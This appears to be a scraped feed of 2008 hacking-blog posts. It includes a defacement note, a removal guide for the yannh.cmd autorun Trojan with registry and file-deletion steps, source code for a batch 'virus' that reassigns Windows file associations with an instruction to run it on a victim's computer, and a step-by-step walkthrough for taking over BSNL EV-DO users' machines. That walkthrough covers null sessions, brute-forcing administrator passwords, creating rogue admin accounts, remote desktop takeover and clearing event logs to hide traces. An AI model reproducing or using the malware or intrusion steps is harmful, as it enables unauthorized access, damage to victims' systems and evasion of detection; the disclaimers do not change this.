If you want to read the book online, you can check with this Link 

You may also download and enjoy reading the book from the above given link.

It seems like it was defaced by arabian hackers. they have placed a viddeo content linked with youtube that plays the baby dance and was mentioned that they were bored, so the hackd the site to make fun.

Here i have enclosed the the snapshot how the defaced site (zone-h.org) looked like,

Tr0jan

“yannh.cmd” is a Trojan that often spreads from external storage medias like USB, CD, DVD widely

by injecting into the autorun.inf file.

When i explored my autorun.inf, i found the few autorun entries made by “Yannh.cmd” like this,

open=yannh.cmd
shell\open\Command=yannh.cmd
shell\explore\Command=yannh.cmd

You can’t directly edit the autorun.inf file while it is currently running, another thing you have to notice is, this file attribute is set to read only mode, hence you have to revoke it first to proceed further.

How can i Identify whether my computer got infected ?

open up your command prompt and type

cd\
dir /a

dir /a – will clearly display all the hidden files in the drives.

This “Yannh.cmd” makes some registry entries in the following path…
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kamsoft
and has its source file in the system32 directory with the name Kamsoft.

Here are the ways that helps you get rid of this Trojan.

Step 1:

Its is always recommended to back-up your registry before touching it, after a successful backup,
goto the below path

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kamsoft
and delete Kamsoft.

Step 2:

Open up the command prompt and type the following

cd\
attrib -r -s -h yannh.cmd
del yannh.cmd

This will delete the yannh.cmd file.

Step 3:

Now you have to delete the kamsoft folder from your system32 directory, just type the below commands in the command prompt.

cd\
cd C:\WINDOWS\system32
attrib -r -s -h kamsoft.exe
del kamsoft.exe

Step 4:

Now you can edit the autorun.inf file to remove the entried added by yannh.cmd

cd\
attrib -r -h -s autorun.inf
edit attrib.inf

Now delete where ever it says yannh.cmd and save changes.
Now you are done with it.

Here are the similar files that you must be aware of,

refsanvn.inf
Zidan vs Tito.exe
desktop.exe
omsirutnarg.exe
Alisa.exe
blazzers.exe
burimi.exe
nfd.exe
repppp.exe
wax.exe
wny.exe
msv2008.exe
GETBOOTD.BAT
tbm9.bat
08dgu.com
1t6yxlxx.cmd
2h60k.cmd
3rl3lqbq.bat
ewatr.cmd
Maradona.exe
iw.bat
m2nl.bat
ov.cmd
pnt.com
t1ypkh.exe
grgarevn.inf
microsvn.inf
Installer.exe
fvbk.exe
snaoc9i.exe
bt8vuaw.com
wjlc.exe
6fnlpetp.exe
g8rruyw.exe
o1.com
Secret.exe
hupxj.bat
fphj6j31.bat
shell.exe

]]> http://technocrawl.wordpress.com/2008/12/28/how-to-remove-yannhcmd-trojan/feed/ 0 technocrawl Tr0jan yannh.cmd http://technocrawl.wordpress.com/2008/12/11/ext_change-virus/ http://technocrawl.wordpress.com/2008/12/11/ext_change-virus/#comments Thu, 11 Dec 2008 08:16:41 +0000 technocrawl http://technocrawl.wordpress.com/2008/12/11/ext_change-virus/ ]]> Here I Have enclosed a simple Extension replaceable batch virus “Ext_change” Source code.

1. Open up a Notepad and copy and paste the below code.

Title Ext_Change Virus
color a
Rem This Virus file replaces the actual file extensions with the given extensions
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit

2. Save it with the extension .bat, and now you are ready to go….
3. Execute this on Victims computer to create havoc.

Its only you who is responsible for what you do with this…. we are not responsible for whatever you do with this… and it is only meant for educational means…

How it Works….

This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…
It replaces all the text files [.txt] with the extension [.jpeg], and likewise….

This hack works on almost all the USB Modems ( ZTE EV-DO ) provided by BSNL.

EVDO is a Technology short for “Evolution – Data only” that uses 3G Technology introduced by Qualcomm.

Here i am going to share how to eavesdrop into someones Network who are using BSNL EV-DO, and using this trick you can entirely take control of the box.
This hack works only with Windows based Boxes.

Step 1 :
Install the Driver required for BSNL ZTE EV-DO Modem, as a part of the installation, it will prompt you to plug-in the device, then change the default username and password, then connect to the internet.

Step 2 :
While the modem is connected to the internet, open up a command prompt and type “Net View”
command in it, then it will display all the names of the machines that are connected to the same network that uses the similar device ( EV-DO ). It will blindly display the hostnames that are a part in that network, but it wont show whether the connected machines are alive or not.

Here is list of hostnames that was available when i was dealing with this, let it be a POC.

Step 3:
Now the major part is to find a host that is alive, and this can be done both manually and
also by using automated Batch program, once you got the host that is alive, you can connect to
its hidden IPC$ ( Inter Process Connect ) share by using the below command,

Net use \\IP-Address\IPC$ “”

in my case i used the following…..

So this will establish a NULL session with the target host that i have used, now the target system and my computer is connected, and by using we have to move further…

Step 4:
Now to check whether there is connection between your computer and the target, just type the below command, net use

This will reveal the current connections…..

Step 5:

In every windows based boxes, there must be an Administrator account, few of them will never set a password for default administrator account, and only few will do it. Now we are trying to gain Administrator access to the remote box, and this can be done by using Dictionary attack or by Launching Brute Force attack against the target.
You can compromise admin account by using Dictionary attack, and you can use the “LAN Remote
user – Dictionary Attack” tool which is already published in the site, else you can click here to check that out.

Check with the syntax properly before starting…..

Step 6:
Once you obtained the password of the administrator account, you can use the same net command
to establish a connection with administrator rights….

Net use \\IP-Address\sharename “password” /user:administrator

once you got the message “Command Completed Successfully” then you are connected to the target
machine with admin access.

Step 7:
Now goto run and type “compmgmt.msc”, this will take you to the Computer management, Click on
Action -> Connect to another computer…. and then type in the IP address or the Hostname of
the target machine.

Once you got access to the remote host, now you can see the computer management(Local) changes
to the Computer Management(XXX.XXX.XXX.XXX) – Remote IP.

Step 8:
You can now create a New user account on the remote machine by expanding the Local users and
Groups -> users -> right click there and create a new user and assign Admin rights.

Step 9:
Now you can start a Terminal Session to the remote host, or you can just start a Remote desktop connection, goto run and type MSTSC and hit enter.

Step 10:
Type in the Ip address of the remote host in the Remote Desktop connection wizard and take over the compter.

Step 11:
To cover the traces just clear all the logs in the eventviewer in the target by using the computer management itself, also make sure to delete the IPC$ connection logs by using the command

Net use \\IP-Address\IPC$ /delete

This is a high Potential Security threat… because anyone can easily gain control over the computer accross the network and can root them, Make them Zombies and later as botnets and so on.

Step 12:
To avoid being a victim to such kind of attacks, you can read the documentation submitted in dark-coderz by Clicking here.

Disclaimer :-
This is only meant for Educational purpose, dark-coderz and its TEAM takes No Responsibilty for any illegal activity.